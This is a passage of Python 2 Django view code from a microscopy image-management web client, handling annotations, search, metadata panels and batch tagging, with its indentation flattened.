dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete('/Annotation', tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse('')
@login_required()
def api_annotations(request, conn=None, **kwargs):
r = request.GET
image_ids = r.getlist('image')
dataset_ids = r.getlist('dataset')
project_ids = r.getlist('project')
screen_ids = r.getlist('screen')
plate_ids = r.getlist('plate')
run_ids = r.getlist('acquisition')
well_ids = r.getlist('well')
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
ann_type = r.get('type', None)
anns, exps = tree.marshal_annotations(conn, project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
page=page,
limit=limit)
return JsonResponse({'annotations': anns, 'experimenters': exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, 'page', 1)
limit = get_long_or_default(request, 'limit', settings.PAGE)
member_id = get_long_or_default(request, 'member_id', -1)
owner_id = get_long_or_default(request, 'owner_id', -1)
except ValueError:
return HttpResponseBadRequest('Invalid parameter value')
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(conn=conn,
member_id=member_id,
owner_id=owner_id,
page=page,
limit=limit)
# Get the discussions
discussions = tree.marshal_discussions(conn=conn,
member_id=member_id,
owner_id=owner_id,
page=page,
limit=limit)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({'shares': shares, 'discussions': discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
Used for Datasets, Plates & Orphaned Images.
"""
# get index of the plate
index = getIntOrDefault(request, 'index', 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and o1_id > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {
'manager': manager,
'form_well_index': form_well_index,
'index': index}
# load data & template
template = None
if 'plate' in kw or 'acquisition' in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(
initial={'index': index, 'range': fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.REQUEST.get('show')
if show is not None:
wells_to_select = []
for w in show.split("|"):
if 'well-' in w:
wells_to_select.append(w.replace('well-', ''))
context['select_wells'] = ','.join(wells_to_select)
context['baseurl'] = reverse('webgateway').rstrip('/')
context['form_well_index'] = form_well_index
context['index'] = index
template = "webclient/data/plate.html"
context['isLeader'] = conn.isLeader()
context['template'] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
These will be groups that the owner(s) of selected objects is a member of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects("Experimenter", ownerIds):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
targetGroupIds.remove(currentGroups.pop())
def getPerms(group):
p = group.getDetails().permissions
return {
'write': p.isGroupWrite(),
'annotate': p.isGroupAnnotate(),
'read': p.isGroupRead()}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append({
'id': gid,
'name': groups[gid].name.val,
'perms': getPerms(groups[gid])
})
targetGroups.sort(key=lambda x: x['name'])
owners = [[k, v] for k, v in owners.items()]
return {'owners': owners, 'groups': targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
""" Loads a tree for user to pick target Project, Dataset or Screen """
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, 'owner', None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = 'webclient/data/chgrp_target_tree.html'
context = {
'manager': manager,
'target_type': target_type,
'template': template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET or request.POST
if form is not None:
query_search = r.get('query').replace("+", " ")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get('searchGroup', None)
ownedBy = r.get('ownedBy', None)
useAcquisitionDate = toBoolean(r.get('useAcquisitionDate'))
startdate = r.get('startdateinput', None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get('enddateinput', None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ['images']
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(query_search, onlyTypes, fields, searchGroup, ownedBy,
useAcquisitionDate, date)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile('^[\d ,]+$')
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(' |,', query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in ('project', 'dataset', 'image', 'screen',
'plate'):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({'otype': t, 'obj': obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
'manager': manager,
'foundById': foundById,
'resultCount': manager.c_size + len(foundById)}
context['template'] = template
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
context = dict()
# we only expect a single object, but forms can take multiple objects
images = (c_type == "image" and
list(conn.getObjects("Image", [c_id])) or
list())
datasets = (c_type == "dataset" and
list(conn.getObjects("Dataset", [c_id])) or list())
projects = (c_type == "project" and
list(conn.getObjects("Project", [c_id])) or list())
screens = (c_type == "screen" and
list(conn.getObjects("Screen", [c_id])) or
list())
plates = (c_type == "plate" and
list(conn.getObjects("Plate", [c_id])) or list())
acquisitions = (c_type == "acquisition" and
list(conn.getObjects("PlateAcquisition", [c_id])) or
list())
shares = ((c_type == "share" or c_type == "discussion") and
[conn.getShare(c_id)] or list())
wells = (c_type == "well" and
list(conn.getObjects("Well", [c_id])) or list())
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
'images': c_type == "image" and [c_id] or [],
'datasets': c_type == "dataset" and [c_id] or [],
'projects': c_type == "project" and [c_id] or [],
'screens': c_type == "screen" and [c_id] or [],
'plates': c_type == "plate" and [c_id] or [],
'acquisitions': c_type == "acquisition" and [c_id] or [],
'wells': c_type == "well" and [c_id] or [],
'shares': ((c_type == "share" or c_type == "discussion") and [c_id] or
[])}
initial = {
'selected': selected, 'images': images, 'datasets': datasets,
'projects': projects, 'screens': screens, 'plates': plates,
'acquisitions': acquisitions, 'wells': wells, 'shares': shares}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(
conn, **{str(c_type): long(c_id)})
except AttributeError, x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context['share'] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context['canExportAsJpg'] = manager.canExportAsJpg(request)
figScripts = manager.listFigureScripts()
context['manager'] = manager
if c_type in ("tag", "tagset"):
context['insight_ns'] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET).val
if form_comment is not None:
context['form_comment'] = form_comment
context['figScripts'] = figScripts
context['template'] = template
context['webclient_path'] = reverse('webindex')
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context['share'] = BaseShare(conn, share_id)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r['owner']['id']
r['current'] = r['id'] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]['id'] < r['id']:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r['c']):
act = "-"
if c['active']:
act = ""
color = c['lut'] if 'lut' in c else c['color']
reverse = 'r' if c['reverseIntensity'] else '-r'
chs.append('%s%s|%d:%d%s$%s'
% (act, i+1, c['start'], c['end'], reverse, color))
rdefQueries.append({
'id': r['id'],
'owner': r['owner'],
'c': ",".join(chs),
'm': r['model'] == 'greyscale' and 'g' or 'c'
})
context['manager'] = manager
context['rdefsJson'] = json.dumps(rdefQueries)
context['rdefs'] = rdefs
context['template'] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {'manager': manager}
context['template'] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(request, c_type, c_id, conn=None, share_id=None,
**kwargs):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(
conn, **{str(c_type): long(c_id)})
except AttributeError, x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == 'image':
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel['form'] = MetadataChannelForm(initial={
'logicalChannel': logicalChannel,
'exWave': ch.getExcitationWave(units=True),
'emWave': ch.getEmissionWave(units=True),
'illuminations': list(conn.getEnumerationEntries(
"IlluminationI")),
'contrastMethods': list(conn.getEnumerationEntries(
"ContrastMethodI")),
'modes': list(conn.getEnumerationEntries(
"AcquisitionModeI"))})
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel['form_dichroic'] = None
channel['form_excitation_filters'] = list()
channel['form_emission_filters'] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel['form_dichroic'] = MetadataDichroicForm(
initial={'dichroic': lightPathDichroic})
filterTypes = list(conn.getEnumerationEntries(
"FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel['form_emission_filters'].append(
MetadataFilterForm(initial={
'filter': f, 'types': filterTypes}))
for f in lightPath.getExcitationFilters():
channel['form_excitation_filters'].append(
MetadataFilterForm(initial={
'filter': f, 'types': filterTypes}))
detectorSettings = logicalChannel.getDetectorSettings()
if (detectorSettings._obj is not None and
detectorSettings.getDetector()):
channel['form_detector_settings'] = \
MetadataDetectorForm(initial={
'detectorSettings': detectorSettings,
'detector': detectorSettings.getDetector(),
'types': list(conn.getEnumerationEntries(
"DetectorTypeI")),
'binnings': list(conn.getEnumerationEntries(
"Binning"))})
lightSourceSettings = \
logicalChannel.getLightSourceSettings()
if (lightSourceSettings is not None and
lightSourceSettings._obj is not None):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel['form_light_source'] = \
MetadataLightSourceForm(initial={
'lightSource': lightSrc,
'lightSourceSettings': lightSourceSettings,
'lstypes': lstypes,
'mediums': list(
conn.getEnumerationEntries(
"LaserMediumI")),
'pulses': list(conn.getEnumerationEntries(
"PulseI"))})
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel['label'] = ch.getLabel()
color = ch.getColor()
channel['color'] = (color is not None and color.getHtml() or
None)
planeInfo = (
manager.image and
manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0))
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append({
'theT': pi.theT,
'deltaT': deltaT,
'exposureTime': exposure})
channel['plane_info'] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(
conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(
conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(initial={
'objectiveSettings': image.getObjectiveSettings(),
'objective': image.getObjectiveSettings().getObjective(),
'mediums': mediums,
'immersions': immersions,
'corrections': corrections})
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={
'image': image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={
'image': image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(initial={
'microscopeTypes': list(
conn.getEnumerationEntries("MicroscopeTypeI")),
'microscope': instrument.getMicroscope()})
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(
conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(
conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(initial={
'objective': o,
'mediums': mediums,
'immersions': immersions,
'corrections': corrections})
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(initial={
'filter': f, 'types': list(
conn.getEnumerationEntries("FilterTypeI"))})
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(
initial={'dichroic': d})
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(initial={
'detectorSettings': None,
'detector': d,
'types': list(
conn.getEnumerationEntries("DetectorTypeI"))})
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for l in lasers:
lstypes = lasertypes
if l.OMERO_CLASS == "Arc":
lstypes = arctypes
elif l.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(initial={
'lightSource': l,
'lstypes': lstypes,
'mediums': list(
conn.getEnumerationEntries("LaserMediumI")),
'pulses': list(
conn.getEnumerationEntries("PulseI"))})
form_lasers.append(form_laser)
# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {'manager': manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context['form_channels'] = form_channels
context['form_environment'] = form_environment
context['form_objective'] = form_objective
context['form_microscope'] = form_microscope
context['form_instrument_objectives'] = form_instrument_objectives
context['form_filters'] = form_filters
context['form_dichroics'] = form_dichroics
context['form_detectors'] = form_detectors
context['form_lasers'] = form_lasers
context['form_stageLabel'] = form_stageLabel
context['template'] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None,
**kwargs):
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
'template': 'webclient/annotations/original_metadata.html',
'imageId': image.getId()}
try:
om = image.loadOriginalMetadata()
if om is not None:
context['original_metadata'] = om[0]
context['global_metadata'] = om[1]
context['series_metadata'] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content='LockTimeout', status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist('image')) > 0 and
list(conn.getObjects("Image", r.getlist('image'))) or
list())
datasets = (
len(r.getlist('dataset')) > 0 and
list(conn.getObjects(
"Dataset", r.getlist('dataset'))) or
list())
projects = (
len(r.getlist('project')) > 0 and
list(conn.getObjects(
"Project", r.getlist('project'))) or
list())
screens = (
len(r.getlist('screen')) > 0 and
list(conn.getObjects("Screen", r.getlist('screen'))) or
list())
plates = (
len(r.getlist('plate')) > 0 and
list(conn.getObjects("Plate", r.getlist('plate'))) or
list())
acquisitions = (
len(r.getlist('acquisition')) > 0 and
list(conn.getObjects(
"PlateAcquisition", r.getlist('acquisition'))) or
list())
shares = (len(r.getlist('share')) > 0 and
[conn.getShare(r.getlist('share')[0])] or list())
wells = (len(r.getlist('well')) > 0 and
list(conn.getObjects("Well", r.getlist('well'))) or list())
return {
'image': images, 'dataset': datasets, 'project': projects,
'screen': screens, 'plate': plates, 'acquisition': acquisitions,
'well': wells, 'share': shares}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
'images': r.getlist('image'),
'datasets': r.getlist('dataset'),
'projects': r.getlist('project'),
'screens': r.getlist('screen'),
'plates': r.getlist('plate'),
'acquisitions': r.getlist('acquisition'),
'wells': r.getlist('well'),
'shares': r.getlist('share')}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = ("Can't add annotations because you don't"
" have permissions")
obj_labels.append({
'type': key.title(), 'id': o.id, 'name': o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (len(request.GET.getlist('tag')) > 0 or
len(request.GET.getlist('tagset')) > 0):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if 'image' in objs and len(objs['image']) > 0:
iids = [i.getId() for i in objs['image']]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo['count'] += archivedInfo['count']
filesetInfo['size'] += archivedInfo['size']
context = {
'iids': iids,
'obj_string': obj_string,
'link_string': link_string,
'obj_labels': obj_labels,
'batch_ann': True,
'figScripts': figScripts,
'canExportAsJpg': canExportAsJpg,
'filesetInfo': filesetInfo,
'annotationBlocked': annotationBlocked,
'differentGroups': False}
if len(groupIds) > 1:
context['annotationBlocked'] = ("Can't add annotations because"
" objects are in different groups")
context['differentGroups'] = True # E.g. don't run scripts etc
context['canDownload'] = manager.canDownload(objs)
context['template'] = "webclient/annotations/batch_annotate.html"
context['webclient_path'] = reverse('webindex')
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
On 'POST', This handles attaching an existing file-annotation(s) and/or
upload of a new file to one or more objects
Otherwise it generates the form for choosing file-annotations & local
files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well']}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in ("dataset", "project", "image", "screen", "plate",
"acquisition", "well", "comment", "file", "tag",
"tagset"):
if o_type == 'tagset':
# TODO: this should be handled by the BaseContainer
o_type = 'tag'
kw = {}
if o_type is not None and o_id > 0:
kw[str(o_type)] = long(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs])
break
initial['files'] = files
if request.method == 'POST':
# handle form submission
form_file = FilesAnnotationForm(
initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data['files']
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks(
'file', files, oids)
# upload new file
fileupload = ('annotation_file' in request.FILES and
request.FILES['annotation_file'] or None)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(
fileupload, oids)
added_files.append(newFileId)
return JsonResponse({'fileIds': added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {'form_file': form_file}
template = "webclient/annotations/files_form.html"
context['template'] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
rating = getIntOrDefault(request, 'rating', 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
# return a summary of ratings
return JsonResponse({'success': True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
""" Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != 'POST':
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well'],
'shares': oids['share']}
# Use the first object we find to set context (assume all objects are in
# same group!) this does not aplly to share
if len(oids['share']) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial,
data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data['comment']
if content is not None and content != "":
if oids['share'] is not None and len(oids['share']) > 0:
sid = oids['share'][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
'tann': textAnn,
'added_by': conn.getUserId(),
'template': "webclient/annotations/comment.html"}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(
content, oids)
context = {
'annId': annId,
'added_by': conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != 'POST':
raise Http404("Need to POST map annotation data as list of"
" ['key', 'value'] pairs")
oids = getObjects(request, conn)
# Use the first object we find to set context (assume all objects are in
# same group!)
# this does not aplly to share
if len(oids['share']) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
data = request.POST.get('mapAnnotation')
data = json.loads(data)
annId = request.POST.get('annId')
# Create a new annotation
if annId is None and len(data) > 0:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(omero.constants.metadata.NSCLIENTMAPANNOTATION)
ann.save()
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
annId = ann.getId()
# Or update existing annotation
elif annId is not None:
ann = conn.getObject("MapAnnotation", annId)
if len(data) > 0:
ann.setValue(data)
ann.save()
annId = ann.getId()
else:
# Delete if no data
handle = conn.deleteObjects('/Annotation', [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
annId = None
return {"annId": annId}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, 'group', -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get('offset'))
limit = int(request.GET.get('limit', 1000))
except:
offset = limit = None
jsonmode = request.GET.get('jsonmode')
if jsonmode == 'tagcount':
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == 'tags':
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == 'desc':
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == 'owners':
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected['projects'],
dataset_ids=selected['datasets'],
image_ids=selected['images'],
screen_ids=selected['screens'],
plate_ids=selected['plates'],
run_ids=selected['acquisitions'],
well_ids=selected['wells'],
ann_type='tag',
# If we reach this limit we'll get some tags not removed
limit=100000)
userMap = {}
for exp in users:
